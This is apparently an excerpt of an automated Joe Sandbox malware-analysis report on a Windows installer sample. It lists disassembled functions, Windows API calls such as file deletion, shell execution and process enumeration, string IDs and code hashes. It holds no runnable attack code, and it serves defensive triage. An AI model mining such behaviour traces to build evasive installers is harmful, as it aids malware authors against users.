                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                    Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: F$A
                                                                                                                                                                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                    Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                    Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                    Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                    Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                    Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                    Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
